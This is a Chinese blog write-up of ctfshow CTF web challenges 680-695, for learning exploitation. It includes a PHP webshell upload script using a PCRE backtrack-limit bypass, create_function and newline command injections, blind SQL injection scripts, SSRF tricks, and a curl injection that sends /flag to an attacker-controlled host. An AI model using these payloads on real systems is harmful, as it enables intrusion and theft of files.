ctfshow 大赛原题 680-695

最新推荐文章于 2022-11-20 16:44:54 发布
最新推荐文章于 2022-11-20 16:44:54 发布
阅读量1.4k 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blowed/article/details/125470505
版权

web 680web 681web 682web 683web 684web 685686 无参RCE的感觉687688689690691692693694695

web 680

一开始提示post code to run

payload:

code=phpinfo();

然后测试了一下很多函数被ban了 看phpinfo果然,发现open_dir目录也限制了

直接print_r(scandir(".")) 列出当前目录

再读取就完事了 highlight_file

web 681

burp抓包分析的时候 输入1' or 1=1#

返回的是 '1or1=1'

尝试 \转义

输入 '||1=1#\

等价于

''||1=1#\'

web 682

要求

if(sha256(m)!=="e3a331710b01ff3b3e34d5f61c2c9e1393ccba3e31f814e7debd537c97ed7d3d"){
        return alert(e)
    }

但是sha256反向解密不行

所以题目下面拆分了 var k=s.split("-")

第一部分

if(sha256(k[0].substr(0,4))!=="c578feba1c2e657dba129b4012ccf6a96f8e5f684e2ca358c36df13765da8400"){
        return alert(e)
    }
    
    if(sha256(k[0].substr(4,8))!=="f9c1c9536cc1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc"){
        return alert(e)
    }

爆破脚本

import hashlib
flag=" "
s="0123456789abcdef"
for i in s:
    for j in s :
        for k in s:
            for l in s:
                string=i+j+k+l
                m=hashlib.sha256(string.encode("utf-8")).hexdigest()
                if(m=="c578feba1c2e657dba129b4012ccf6a96f8e5f684e2ca358c36df13765da8400"):
                      print(m)
                      flag+=string
                      print(flag)
                if(m=="f9c1c9536cc1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc"):
                      print(m)
                      flag+=string
                      print(flag)
                      

得到八位ctfshow{592b9d77-}

if(parseInt(k[1][0])!==(c2n('a')-1)){
        return alert(e)
    }
    
if(k[1][1]+k[1][2]+k[1][3]!=='dda'){
        return alert(e)
    }
 if(k[2][1]!=='e'){
        return alert(e)
    }
    
    if(k[2][0]+k[2][2]+k[2][3]!=0x1ae){  0x1ae =430
        return alert(e)
    }

找到c2n函数 发现c2n('a')=10;

所以此时 ctfshow{592b9d77-9dda-4e30}

if(parseInt(k[3][0])!==(c2n('a')-1)){   9
        return alert(e)
    }
​
    if(parseInt(k[3][1])!==parseInt(k[3][3])){ 
        return alert(e)
    }
​
    if(parseInt(k[3][3])*2+c2n('a')!==0x12){ (18-10)/2
        return alert(e)
    }
​
    if(sha224(k[3][2])!=='abd37534c7d9a2efb9465de931cd7055ffdb8879563ae98078d6d6d5'){  a
        return alert(e)
    }

ctfshow{592b9d77-9dda-4e30-944a}

if(st3(k[4])!=='GVSTMNDGGQ2DSOLBGUZA===='){
        return alert(e)
    }
    base32 解密

ctfshow{592b9d77-9dda-4e30-944a-5e64f4499a52}

web 683

(int)("0xxxx")=0;

payload:?秀=0x4F1A01

web 684

在PHP的命名空间默认为\,所有的函数和类都在\这个命名空间中,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name() 这样调用函数,则其实是写了一个绝对路径。如果你在其他namespace里调用系统类,就必须写绝对路径这种写法。

create_function('$a,$b','return 111')
​
==>
​
function a($a, $b){
    return 111;
}

所以payload

?action=\create_function&arg=}system("cat /secret_you_never_know ");//

web 685

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌

具体原理在p神

根据回溯最大为100万次 超过则返回false 绕过

from io import BytesIO
import requests
url="http://31cb6c95-d013-462e-828d-b9d5b11e1942.challenge.ctf.show/"
files={
    'file': BytesIO(b'aaa<?php eval($_POST[1]);//' + b'b' * 1000000)
}
r=requests.post(url,files=files)
for i in range(0,10):
    u=url+'data/{0}.php'.format(i)
    r=requests.post(u,data={'1':'system("cat /secret_you_never_know");'})
    if 'b' in r.text:
        print(r.text)
​

羽师傅脚本

import requests
url="http://3c7c34aa-52d3-48d2-9dec-3679a65588c9.challenge.ctf.show/"
files={
    'file':'<?php eval($_POST[1]);?>'+'b'*1000000
}
r=requests.post(url,files=files)
for i in range(0,10):
    u=url+'data/{0}.php'.format(i)
    r=requests.post(u,data={'1':'system("cat /secret_you_never_know;echo yu22x");'})
    if 'yu22x' in r.text:
        print(r.text)
​

686 无参RCE的感觉

getallheaders是apache中的函数,这里是nginx环境, 所以用get_defined_vars()

方法一:

?code=eval(end(current(get_defined_vars())));&b=phpinfo();

方法二:列目录

正常 print_r(scandir)

print_r(scandir(current(localeconv())));

687

payload:

http://3696b171-ef1c-43bc-8d5f-e6fdb623c859.challenge.ctf.show/?ip=127%0acat /flaaag

688

 

大概第一个就是把输入的直接当字符串

第二个的处理我有点懵逼 ,不过如果没过滤 我们要 curl url -F file=@/flag

试着

 

再然后就后面加个点看看

payload :

?url=http://ip:1337/' -F file=@/flag '

689

考点是ssrf 我们传入的参数file必须以http://127.0.0.1/开头,path不能有.. 假设我们传入 ?file=http://127.0.0.1/&path=<?php phpinfo();?> 那么页面会显示如下内容

在这里插入图片描述

如果我们传入的file换成现在的url会发生什么?是不是把这个页面给写进去了 所以payload ?file=http://127.0.0.1/?file=http://127.0.0.1/%26path=<?php phpinfo();?>&path=a.php

690

691

order by 大小比较盲注

 

 

所以真正的字符是c

写脚本

import requests
​
url="http://deeb3ee4-3bad-42a3-9b5e-c26051eab4ca.challenge.ctf.show/"
s=".0123456789:abcdefghijklmnopqrstuvwxyz{|}~"
k=""
for i in range(1,40):
    for j in s:
        l=k+j
        data={
        "username":"' or 1 union select 1,2,'{}' order by 3#".format(l),
        "password":"12"
            }
            
        res=requests.post(url=url,data=data)
        if "</code>admin" in res.text:
            k=k+chr(ord(j)-1)
            print(k)
            break
        
​

692

相等于在传入的字符加上了单引号

;eval($_POST[1]);//  => ';eval($_POST[1]);//'
%00          =>'';eval($_POST[1]);//''

693

远程文件包含即可

694

 

最终形成的路径为

/var/www/html/a.php/.

695

koajs

https://github.com/koajs/koa-body/issues/75

漏洞点在 ctx.request.body.files

如果向文件上传的路由上传json主体的格式,那么其中path将被解析成已经上传完的文件位置保存到相应文件中。

 

Fnylad
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFSHOW大赛原题篇(web756-web770)
羽的博客
03-04 1144
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。 文章目录web756web757web758web759web760web761web762web782web785web786web787web788web789 web756 code=GLOBALS web757 每次传入的key前七个字符需要是上传返回的,并且substr(md5($value),5,4)==0) 因为不是每一次md5都有可能字母开头,所以我们需要多测试几次,直接在给的key后面不断加字符就可以了。 import reque
CTFSHOW大赛原题篇(web711-web725)
羽的博客
02-27 4039
文章目录web711web712web713web782web785web786web787web788web789 web711 扫描目录发现存在robots.txt,提示static/secretkey.txt 访问得到一串字符串ctfshow_love_you 然后进入正常的页面,有个登录和注册,随便注册个用户并且登录后,发现存在文件上传点。 但是上传php后缀的文件不解析,应该不是php写的了。 看下session,应该是一个jwt加密的。那就好说了,伪造一个admin用户,而且加密的秘钥应该就是刚
CTFSHOW大赛原题篇(web696-web710)
羽的博客
02-23 1507
文章目录web696web697web698web699web700web701web702web703web704web705web707web708web709web710 web696 下载源码是个django的框架。 web1里面的利用点很明显,存在一个ssrf 而在web2的app.py中存在ssti模板注入 所以我们的目的就是通过web1来访问web2,最终通过ssti达到rce的,目的。 在web1中我们想利用ssrf必须先得到token,也就是需要用admin登录。 所以我们要做的第一
CTFSHOW大赛原题篇(web726-web740)
羽的博客
02-27 960
web726 username=;eval($_POST[1]);phpinfo();// username=%00 同之前的web692 web727 自增绕过 $_=[];$_=$_.'';$_=$_[';'=='$'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;
CTFSHOW大赛原题篇(web680-web695)
羽的博客
02-23 2193
CTFSHOW大赛原题web680 code=phpinfo(); 先看下disable_function,有一堆过滤。并且open_basedir做了目录限制。 r然后看下当前目录下的文件 code=var_dump(scandir(".")); 发现一个文件secret_you_never_know 直接访问就拿到flag了 。。。。。。(大无语) web681 登录的时候抓个包,比如我们传name=123会返回sql语句 select count(*) from ctfshow_users whe
ctfshow-web41~60-WP
最新发布
02-21
本篇文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 #### 题目背景与目标 在题目41中,参与者需要分析给定的PHP代码片段,理解其逻辑并找到漏洞所在。目标是...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-大赛原题改编(未完慢慢更)
paidx0
04-24 1681
文章目录web680web681web682web683web684 create_function()web685web686(无参RCE)姿势一 getallheaders()姿势二 get_defined_vars()姿势三 session_id()web687web688 escapeshellcmd()web689 ssrfmeweb690web691order by 的一个盲注小技巧web692web693web694web695web696web697web698web711web71
CTFSHOW大赛原题篇(web771-web790)
羽的博客
03-04 949
因为题目较多,所以很多地方写的比较简略,望师傅们谅解。。 暂时先更新到这了,毕竟还是要工作的。。。。 文章目录web771web773web774web775web776web 777web778web779web780web781web782web784web785web786web787web788web789web790 web771 GXYCTF2019 你的名字 题目过滤了{{}} 只要使用就直接报错,所以只能用{%%}进行盲注了 然后也过滤了一些字符,但是只是替换成空了。所以可以直接往想使用的字
CTFSHOW web680-780(大赛原题)
qq_37561898的博客
01-29 3965
ctfshow CTF ctfshow大赛原题
ctf.show大赛原型(web680-681)
wanan的博客
08-31 263
ctf.show大赛原型(web680-681)
CTFshow [web 6-8]
weixin_45253622的博客
05-10 346
web5 代码审计题型。 where is flag? <?php error_reporting(0); //关闭错误报告 ?> <html lang="zh-CN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-w...
CTFSHOW WEB 1-100
weixin_54558860的博客
11-20 3899
ctfshow web 1-100
CTFSHOW-WEB详解
qq_49422880的博客
05-25 4823
CTFSHOW-WEB详解一、WEB13--文件上传二、WEB-红包题第二弹 一、WEB13–文件上传   开始的界面就是文件上传,确定方向为文件上传漏洞分析,尝试上传文件,我上传的第一个文件是一个文本文件很小只有9个字节,就上传成功了直接,还以为会按往常一样出现绝对路径又或者提示只能上传别的格式文件,然后我们通过绕过,接着使用蚁剑连接直接看文件拿到flag。   然而。。。。。。   简单的信息泄露例子,看完绝对不亏.   事情没有我们想的那么简单,我上传一个webshell的时候,发现内容超过了大小,又
CTFSHOW做题记录
weixin_45990644的博客
03-30 537
CTFSHOW做题记录 ** CTFSHOW做题记录1 ** (菜菜的我要写日记啦,欢迎大佬指导) ** 密码学签到1 给出“}wohs.ftc{galf”并且提示倒叙。 ** 解题思路: 没看提示的时候乍一看以为是栅栏密码,还想着用在线解密去做,但是定睛一看不对劲,再看题目原来就是倒叙。只需要反着来就好啦。 ** 答案: flag{ctf.show} ** 今天也是元气满满的一天,好好学习。 ...
ctf.show-web-1000题
weixin_46079186的博客
12-07 5832
信息收集 爆破 命令执行 文件包含 php特性 文件上传 sql注入 反序列化 java 代码审计 phpCVE XSS nodejs jwt SSRF SSTI XXE 区块链安全 黑盒测试
CTFShow web入门刷题记录-爆破
打酱油的杯具的博客
11-29 2282
CTFShow web入门刷题记录-爆破 web21 先下载提供的密码包,查看hint得知考点为tomcat 账号提示为amdin,点击提交并使用burpsuit抓包 发现底下为一串经过base64编码的文字,翻译后得知为admin: 得知提交格式为:账号:密码 传入intruder,选中并添加$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xsSzs95u-1606660930041)(C:/Users/%E8%83%A1%E5%A5%87/AppData/Roami
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值